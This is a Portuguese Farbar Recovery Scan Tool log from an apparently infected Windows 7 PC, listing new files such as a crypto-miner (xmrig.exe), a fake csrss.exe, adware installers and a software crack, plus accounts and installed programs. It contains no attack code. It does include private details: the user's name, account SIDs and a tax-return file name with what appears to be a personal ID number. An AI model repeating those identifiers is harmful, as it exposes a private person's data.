2018-06-05 22:07 - 2018-06-05 22:07 - 000001100 _____ C:\Users\Alessandra\Desktop\Adult Dating.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000001096 _____ C:\Users\Alessandra\Desktop\Play Warframe.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000001096 _____ C:\Users\Alessandra\Desktop\Play Crossout.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000001092 _____ C:\Users\Alessandra\Desktop\Win iPhone X.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Users\Todos os Usuários\dahkService
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\ProgramData\dahkService
2018-06-05 22:07 - 2018-06-05 22:07 - 000000000 ____D C:\Program Files (x86)\io
2018-06-05 22:06 - 2018-06-05 22:24 - 000003520 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-06-05 22:06 - 2018-06-05 22:24 - 000003208 _____ C:\Windows\System32\Tasks\csrss
2018-06-05 22:06 - 2018-06-05 22:11 - 000016080 _____ C:\Users\Alessandra\AppData\Local\InstallationConfiguration.xml
2018-06-05 22:06 - 2018-06-05 22:07 - 005562240 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2018-06-05 22:06 - 2018-06-05 22:07 - 000605552 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\ScotJob.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 000929792 _____ C:\Users\Alessandra\AppData\Local\sham.db
2018-06-05 22:06 - 2018-06-05 22:06 - 000278509 _____ C:\Users\Alessandra\AppData\Local\Unadom.bin
2018-06-05 22:06 - 2018-06-05 22:06 - 000140800 _____ C:\Users\Alessandra\AppData\Local\installer.dat
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ___HD C:\Windows\rss
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ____D C:\Users\Todos os Usuários\PrefsSecure
2018-06-05 22:06 - 2018-06-05 22:06 - 000000000 ____D C:\ProgramData\PrefsSecure
2018-06-05 22:04 - 2018-06-05 22:04 - 000983550 _____ C:\Users\Alessandra\Downloads\ConvertXtoDVD_5_1_0_2_Crack_Patch_em_Portugues_Full.zip
2018-06-05 21:54 - 2018-06-05 21:54 - 000596494 _____ C:\Users\Alessandra\Downloads\Pokemon GS Demo (1).xlsx
2018-06-05 21:53 - 2018-06-05 21:53 - 000597031 _____ C:\Users\Alessandra\Downloads\Pokemon GS Demo.xlsx
2018-06-05 21:49 - 2017-12-02 08:06 - 541792260 _____ C:\Users\Alessandra\Desktop\1_01_H_171201170000.h264
2018-06-05 21:47 - 2018-06-05 21:47 - 000000000 ____D C:\Program Files (x86)\MediaPlayer
2018-06-05 05:50 - 2018-06-05 05:50 - 001838592 _____ C:\Windows\de4044e4defdf98de3594496c13dd62f.exe
2018-06-05 05:50 - 2018-06-05 05:50 - 000144696 _____ C:\Windows\system32\Drivers\d9f123ea30f4c200a5898caa9c1b70f5.sys
2018-06-05 05:50 - 2018-06-05 05:50 - 000037096 _____ C:\Windows\uninstaller.dat
2018-06-04 10:53 - 2018-06-05 11:11 - 000000000 ____D C:\Users\Alessandra\Desktop\Torneio interscolar mundial
2018-06-04 10:52 - 2018-06-04 10:53 - 004206967 _____ C:\Users\Alessandra\Downloads\Torneio interscolar mundial-20180604T135253Z-001.zip
2018-06-04 09:59 - 2018-06-05 10:30 - 000000000 ____D C:\Users\Alessandra\Desktop\Boku no hero rpg
2018-06-04 09:51 - 2018-06-05 10:26 - 000000000 ____D C:\Users\Alessandra\Desktop\Mutual 2018
2018-06-04 09:45 - 2018-06-04 09:47 - 161073489 _____ C:\Users\Alessandra\Downloads\2017-07-0010-peace-in-christ-complete-mp3-por.zip
2018-06-01 14:14 - 2018-06-01 14:14 - 000000081 _____ C:\Users\Alessandra\Desktop\bnhrpg.txt
2018-05-30 12:27 - 2018-05-30 12:34 - 000176525 _____ C:\Users\Alessandra\Desktop\Ficha Boku no hero.pdf
2018-05-28 13:06 - 2018-05-28 13:06 - 004826048 _____ C:\Users\Alessandra\Downloads\freeshop.cia
2018-05-28 12:34 - 2018-05-28 12:34 - 000000000 ____D C:\Users\Alessandra\Desktop\Classe 1B UA
2018-05-28 12:34 - 2018-05-28 12:34 - 000000000 ____D C:\Users\Alessandra\Desktop\Classe 1A UA
2018-05-28 12:33 - 2018-05-28 12:33 - 001722873 _____ C:\Users\Alessandra\Downloads\drive-download-20180528T153320Z-001.zip
2018-05-28 12:27 - 2018-05-28 12:27 - 000102439 _____ C:\Users\Alessandra\Desktop\Boku-no-Hero.jpeg
2018-05-28 12:23 - 2016-12-01 15:52 - 000000000 ____D C:\Users\Alessandra\Desktop\d&d dados
2018-05-28 12:22 - 2018-05-28 12:22 - 014356903 _____ C:\Users\Alessandra\Downloads\d&d dados (1).rar
2018-05-28 10:58 - 2018-05-28 10:58 - 000174480 _____ C:\Users\Alessandra\Downloads\decTitleKeys.bin
2018-05-25 19:16 - 2018-01-11 17:24 - 001116608 _____ (VoiceFive, Inc.) C:\Windows\system32\pmls64.dll
2018-05-25 19:16 - 2018-01-11 17:24 - 000752576 _____ (VoiceFive, Inc.) C:\Windows\SysWOW64\pmls.dll
2018-05-15 20:49 - 2018-04-10 16:22 - 000043560 ____N (GAS Tecnologia) C:\Windows\system32\Drivers\wsddprm.sys
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (4).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (3).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (2).pdf
2018-05-07 18:07 - 2018-05-07 18:07 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6 (1).pdf
2018-05-07 17:57 - 2018-05-07 17:57 - 000031989 _____ C:\Users\Alessandra\Downloads\tickets-5af08331e1cb041f50d7fad6.pdf
2018-05-04 10:58 - 2018-05-04 10:58 - 000000000 ____D C:\Users\Alessandra\Documents\lista de empresas
2018-05-04 10:58 - 2018-05-04 10:58 - 000000000 ____D C:\Users\Alessandra\Documents\AUTORIZAÇÕES ESPECIAIS 05 2018
2018-04-27 22:56 - 2018-04-27 22:56 - 000006705 _____ C:\Users\Alessandra\Documents\08601708889-IRPF-A-2018-2017-ORIGI.DBK
2018-04-27 10:32 - 2018-04-27 10:32 - 000000000 ____D C:\Users\Alessandra\.rfb
2018-04-27 10:25 - 2018-04-27 10:27 - 071830472 _____ (Oracle Corporation) C:\Users\Alessandra\Downloads\jre-8u171-windows-x64.exe
2018-04-27 10:20 - 2018-04-27 10:20 - 000001724 _____ C:\Users\Public\Desktop\IRPF2018 - Declaração de Ajuste Anual, Final de Espólio e Saída Definitiva do País.lnk
2018-04-27 10:19 - 2018-04-27 10:19 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programas RFB2018
2018-04-27 10:19 - 2018-04-27 10:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Programas RFB2018
2018-04-27 10:18 - 2018-04-27 10:19 - 031188040 _____ (Receita Federal do Brasil) C:\Users\Alessandra\Downloads\IRPF2018Win32v1.4 (1).exe
2018-04-25 08:42 - 2018-04-25 08:43 - 031188040 _____ (Receita Federal do Brasil) C:\Users\Alessandra\Downloads\IRPF2018Win32v1.4.exe
2018-04-12 13:45 - 2018-06-05 22:20 - 000000352 _____ C:\Windows\Tasks\HPCeeScheduleForAlessandra.job
2018-04-12 13:45 - 2018-06-05 21:43 - 000003216 _____ C:\Windows\System32\Tasks\HPCeeScheduleForAlessandra
2018-04-06 09:16 - 2018-04-06 09:20 - 000000000 ____D C:\Users\Alessandra\Documents\fotos
2018-04-03 06:26 - 2018-04-03 06:26 - 000000000 ____D C:\Program Files\Common Files\Adobe
2018-03-28 09:18 - 2018-03-28 09:18 - 000000000 ____D C:\Users\Alessandra\Documents\Modelos Personalizados do Office
2018-03-28 08:42 - 2018-03-28 08:42 - 000000000 ____D C:\Users\Public\Documents\Tools
2018-03-24 15:34 - 2018-03-24 15:34 - 000000000 ____D C:\Users\Public\Documents\Guid
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Ultra Necrozma by Glezcar (2704)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Mask Island - Steven Universe by Brolopie66 (3426)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Majoras Mask by Radnar8959 (3589)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\Jojo's Bizzare Adventure by blujay (2202)
2018-03-12 22:27 - 2018-03-12 22:27 - 000000000 ____D C:\Users\Alessandra\Downloads\ext_previews
2018-03-12 22:27 - 2018-02-03 16:24 - 000014016 _____ C:\Users\Alessandra\Downloads\info.smdh
2018-03-12 22:27 - 2018-02-03 16:24 - 000000014 _____ C:\Users\Alessandra\Downloads\name.txt
2018-03-12 22:27 - 2017-12-20 01:36 - 002978208 _____ C:\Users\Alessandra\Downloads\bgm.bcstm
2018-03-12 22:27 - 2017-12-20 01:36 - 000830220 _____ C:\Users\Alessandra\Downloads\bgm.ogg
2018-03-12 22:27 - 2017-12-20 01:36 - 000394169 _____ C:\Users\Alessandra\Downloads\body_LZ.bin
2018-03-12 22:15 - 2018-03-12 22:15 - 004500045 _____ C:\Users\Alessandra\Downloads\Ultra Necrozma by Glezcar (2704).zip
2018-03-12 22:14 - 2018-03-12 22:14 - 005579475 _____ C:\Users\Alessandra\Downloads\Jojo's Bizzare Adventure by blujay (2202).zip
2018-03-12 22:14 - 2018-03-12 22:14 - 004866454 _____ C:\Users\Alessandra\Downloads\Mask Island - Steven Universe by Brolopie66 (3426).zip
2018-03-12 22:13 - 2018-03-12 22:14 - 002002121 _____ C:\Users\Alessandra\Downloads\Majoras Mask by Radnar8959 (3589).zip

==================== Três Meses Modificados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2018-06-06 07:56 - 2009-07-14 01:45 - 000020512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-06-06 07:56 - 2009-07-14 01:45 - 000020512 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-06-06 07:54 - 2016-12-16 19:30 - 000002230 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-06-06 07:54 - 2016-12-16 19:30 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-06-06 07:47 - 2017-10-05 14:42 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-06-06 07:46 - 2017-05-25 12:25 - 000000000 ____D C:\Program Files (x86)\PremierOpinion
2018-06-06 07:43 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-05 22:25 - 2017-01-02 15:36 - 000028376 _____ (GAS Tecnologia) C:\Windows\system32\Drivers\wsddfac.sys
2018-06-05 22:23 - 2017-05-25 12:21 - 000003178 __RSH C:\Users\Todos os Usuários\ntuser.pol
2018-06-05 22:23 - 2017-05-25 12:21 - 000003178 __RSH C:\ProgramData\ntuser.pol
2018-06-05 22:23 - 2015-12-18 09:02 - 000000000 ____D C:\Users\Alessandra
2018-06-05 22:20 - 2017-05-08 17:33 - 000000000 ____D C:\Windows\Minidump
2018-06-05 22:18 - 2017-10-20 19:53 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\uTorrent
2018-06-05 22:17 - 2017-10-25 23:18 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\uTorrent
2018-06-05 22:14 - 2017-05-25 14:14 - 000001001 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2018-06-05 22:14 - 2017-05-25 14:14 - 000001001 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2018-06-05 22:14 - 2015-12-18 09:03 - 000001277 _____ C:\Users\Alessandra\Desktop\Internet Explorer.lnk
2018-06-05 22:11 - 2009-07-14 00:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-06-05 21:47 - 2009-07-14 14:55 - 002680826 _____ C:\Windows\system32\prfh0416.dat
2018-06-05 21:47 - 2009-07-14 14:55 - 002014884 _____ C:\Windows\system32\prfc0416.dat
2018-06-05 21:47 - 2009-07-14 02:13 - 000006258 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-30 12:07 - 2009-07-14 02:32 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-05-28 15:07 - 2015-12-18 09:06 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\Skype
2018-05-17 19:53 - 2015-12-18 09:40 - 000003502 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-17 19:53 - 2015-12-18 09:40 - 000003374 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-17 19:47 - 2015-12-18 09:43 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-05-17 19:45 - 2017-08-29 19:35 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-05-08 21:13 - 2015-12-26 12:04 - 000000000 ____D C:\Users\Alessandra\AppData\Local\ElevatedDiagnostics

==================== Arquivos na raiz de alguns diretórios =======

2016-02-14 18:27 - 2017-09-12 21:06 - 000000118 _____ () C:\Users\Alessandra\jobq.dat
1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 ____N (Microsoft Corporation) C:\Users\Alessandra\VAxueQ.exe
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ () C:\ProgramData\lock.dat
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ () C:\Users\Todos os Usuários\lock.dat
1601-01-03 21:33 - 1601-01-03 21:33 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\EeTooio.exe
2017-02-01 11:20 - 2017-02-01 11:20 - 000000046 _____ () C:\Users\Alessandra\AppData\Roaming\Camdata.ini
2017-02-01 11:20 - 2017-02-01 11:20 - 000000408 _____ () C:\Users\Alessandra\AppData\Roaming\CamLayout.ini
2017-02-01 11:20 - 2017-02-01 11:20 - 000000408 _____ () C:\Users\Alessandra\AppData\Roaming\CamShapes.ini
2017-02-01 11:19 - 2017-02-01 11:19 - 000004509 _____ () C:\Users\Alessandra\AppData\Roaming\CamStudio.cfg
2017-10-25 23:43 - 2017-10-25 23:43 - 000000132 _____ () C:\Users\Alessandra\AppData\Roaming\Preferências do Formato PNG do Adobe CS6
2015-12-26 11:54 - 2015-12-26 11:54 - 000018115 _____ () C:\Users\Alessandra\AppData\Roaming\unins000.dat
2015-12-26 11:54 - 2015-12-26 11:54 - 000730322 _____ () C:\Users\Alessandra\AppData\Roaming\unins000.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 007627776 _____ () C:\Users\Alessandra\AppData\Local\agent.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000070896 _____ () C:\Users\Alessandra\AppData\Local\Config.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 001895384 _____ () C:\Users\Alessandra\AppData\Local\DamTantax.bin
2016-05-20 20:14 - 2016-05-20 20:14 - 000000000 _____ () C:\Users\Alessandra\AppData\Local\dark990.pig
2018-06-05 22:06 - 2018-06-05 22:11 - 000016080 _____ () C:\Users\Alessandra\AppData\Local\InstallationConfiguration.xml
2018-06-05 22:06 - 2018-06-05 22:06 - 000140800 _____ () C:\Users\Alessandra\AppData\Local\installer.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000018432 _____ () C:\Users\Alessandra\AppData\Local\Main.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000005568 _____ () C:\Users\Alessandra\AppData\Local\md.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 000126464 _____ () C:\Users\Alessandra\AppData\Local\noah.dat
2018-06-05 22:06 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\ScotJob.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 001987953 _____ () C:\Users\Alessandra\AppData\Local\ScotJob.tst
2018-06-05 22:06 - 2018-06-05 22:06 - 000929792 _____ () C:\Users\Alessandra\AppData\Local\sham.db
2018-06-05 22:06 - 2018-06-05 22:06 - 000278509 _____ () C:\Users\Alessandra\AppData\Local\Unadom.bin
2018-06-05 22:11 - 2018-06-05 22:11 - 000032038 _____ () C:\Users\Alessandra\AppData\Local\uninstall_temp.ico
2018-06-05 22:08 - 2018-06-05 22:08 - 000000003 _____ () C:\Users\Alessandra\AppData\Local\wbem.ini

Arquivos para serem movidos ou deletados:
====================
C:\Program Files (x86)\bf1o5vdufsa\VQ4R6SI3GUSCYUI.exe
C:\Windows\rss\csrss.exe
C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


Alguns arquivos em TEMP:
====================
2018-06-05 22:13 - 2018-06-05 22:13 - 001538232 _____ (BANANA SUMMER LIMITED) C:\Users\Alessandra\AppData\Local\Temp\1528247576tmp.exe
2017-09-20 18:57 - 2016-01-26 01:40 - 000066496 _____ (Autodesk, Inc.) C:\Users\Alessandra\AppData\Local\Temp\AcDeltree.exe
2018-06-05 22:09 - 2018-06-05 22:09 - 013205167 _____ (MAL ) C:\Users\Alessandra\AppData\Local\Temp\b25dktopqhy.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 001240792 _____ () C:\Users\Alessandra\AppData\Local\Temp\but-setup-9.exe
2018-06-05 22:05 - 2018-06-05 22:05 - 002948240 _____ (BitTorrent Inc.) C:\Users\Alessandra\AppData\Local\Temp\ConvertXtoDVD_5_1_0_2_Crack_Patch_em_Portugues_Full_.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001549592 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\data.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 001527488 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\dbghelp.dll
2018-06-05 22:07 - 2018-06-05 22:07 - 002805760 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\installer_mi.exe
2017-09-02 11:15 - 2017-09-02 11:15 - 000740416 _____ (Oracle Corporation) C:\Users\Alessandra\AppData\Local\Temp\jre-8u144-windows-au.exe
2018-06-05 22:07 - 2018-06-05 22:08 - 008460935 _____ () C:\Users\Alessandra\AppData\Local\Temp\s2s.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000675152 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\setup (1).exe
2018-06-05 22:05 - 2018-06-05 22:06 - 001810944 _____ (TODO: ) C:\Users\Alessandra\AppData\Local\Temp\setup.exe
2017-07-17 15:15 - 2017-10-30 08:43 - 058881488 _____ (Skype Technologies S.A.) C:\Users\Alessandra\AppData\Local\Temp\SkypeSetup.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000791610 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\speedownloader.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 000167616 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\symsrv.dll
2017-11-16 12:01 - 2017-10-17 13:01 - 000927784 _____ () C:\Users\Alessandra\AppData\Local\Temp\TAInstaller.exe
2017-12-06 12:15 - 2017-12-06 12:15 - 013767776 _____ (Microsoft Corporation) C:\Users\Alessandra\AppData\Local\Temp\vcredist_x86.exe
2018-06-05 22:07 - 2018-06-05 22:07 - 000423152 _____ (McAfee, Inc.) C:\Users\Alessandra\AppData\Local\Temp\webupd.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001131341 _____ ( ) C:\Users\Alessandra\AppData\Local\Temp\whiteclick.exe
2014-06-29 16:16 - 2014-06-29 16:16 - 000008704 _____ () C:\Users\Alessandra\AppData\Local\Temp\wlan_test.exe
2009-01-16 06:20 - 2009-01-16 06:20 - 000144088 _____ () C:\Users\Alessandra\AppData\Local\Temp\WZCPlugin_VISTA.exe
2018-06-05 22:12 - 2018-06-06 07:48 - 002064847 _____ () C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
2018-06-05 22:06 - 2018-06-05 22:06 - 003224064 _____ () C:\Users\Alessandra\AppData\Local\Temp\xtex.exe

==================== Bamital & volsnap ======================

(Não há correção automática para arquivos que não passaram na verificação.)

C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
C:\Windows\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restaurado com sucesso

LastRegBack: 2018-05-08 21:06

==================== Fim de FRST.txt ============================





"Addition.txt"

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 03.06.2018
Executado por Alessandra (06-06-2018 08:01:39)
Executando a partir de C:\Users\Alessandra\Desktop
Windows 7 Professional Service Pack 1 (X64) (2015-12-18 12:02:41)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-1322778411-14668823-402750941-500 - Administrator - Disabled)
Alessandra (S-1-5-21-1322778411-14668823-402750941-1000 - Administrator - Enabled) => C:\Users\Alessandra
Convidado (S-1-5-21-1322778411-14668823-402750941-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1322778411-14668823-402750941-1002 - Limited - Enabled)

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACA & MEP 2017 Object Enabler (HKLM\...\{28B89EEF-0004-0000-5102-CF3F3A09B77D}) (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{28B89EEF-0001-0000-3102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Português (HKLM-x32\...\{AC76BA86-7AD7-1046-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
Allavsoft 3.15.1.6481 (HKLM-x32\...\{6EBED4D8-13D9-4270-8D44-B57DDB7A787C}_is1) (Version: - Allavsoft Corporation)
Aplicativo da área de trabalho Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 7.0.6.378 - Autodesk)
Aplicativos da Autodesk em destaque 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
AutoCAD 2017 - English (HKLM\...\{28B89EEF-0001-0409-2102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (HKLM\...\{28B89EEF-0001-0000-0102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (HKLM\...\{28B89EEF-0001-0409-1102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\{5F0F7049-0000-1033-0102-73A6DA3D7FA6}) (Version: 3.0.0.52 - Autodesk) Hidden
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Build Tools - amd64 (HKLM\...\{F74753A3-C93C-34F5-A199-993CAF602B7D}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools - x86 (HKLM-x32\...\{FB3A15FD-FC67-3A2F-892B-6890B0C56EA9}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - amd64 (HKLM\...\{05198C22-FFCE-374A-B190-9F18CC99DAEA}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (HKLM-x32\...\{9347889B-C22A-3905-901F-C05D8F73C929}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
CertiPlugin 1.0.0.11 (HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\{E74B2E92-1570-41FB-AB75-1A618DD3FCE3}_is1) (Version: 1.0.0.11 - Certisign)
CloudNet (HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENÇÃO
ETDWare X64 11.7.20.5_WHQL (HKLM\...\Elantech) (Version: 11.7.20.5 - ELAN Microelectronic Corp.)
FamilySearch Indexing 3.27.8 (HKLM-x32\...\0591-8077-9297-0833) (Version: 3.27.8 - FamilySearch)
FARO LS 1.1.505.0 (64bit) (HKLM-x32\...\{8834451B-6209-4E02-9EF4-4EF9E3C1F70F}) (Version: 5.5.0.44203 - FARO Scanner Production)
FastDataX 1.20 (HKLM-x32\...\FastDataX_is1) (Version: 1.20 - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
GBBD Caixa Economica Federal (HKLM-x32\...\{5d01f486-f32d-462e-8830-cc1d116e8ece}_is1) (Version: 3.12.0.2 - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HP Deskjet 2050 J510 series Ajuda (HKLM-x32\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Deskjet 2050 J510 series Estudo de aprimoramento de produtos (HKLM\...\{8D71EFB0-B1EF-4478-92D2-A65DB23AC460}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Software básico do dispositivo (HKLM\...\{2DCBB45E-AA03-4089-87E7-EC17E606D738}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.6.18.11 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{57A79409-9C79-4080-9FFA-09D4DAECC26B}) (Version: 12.9.18.3 - HP)
HP Touchpoint Analytics Client (HKLM\...\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}) (Version: 4.0.2.1439 - HP Inc.)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
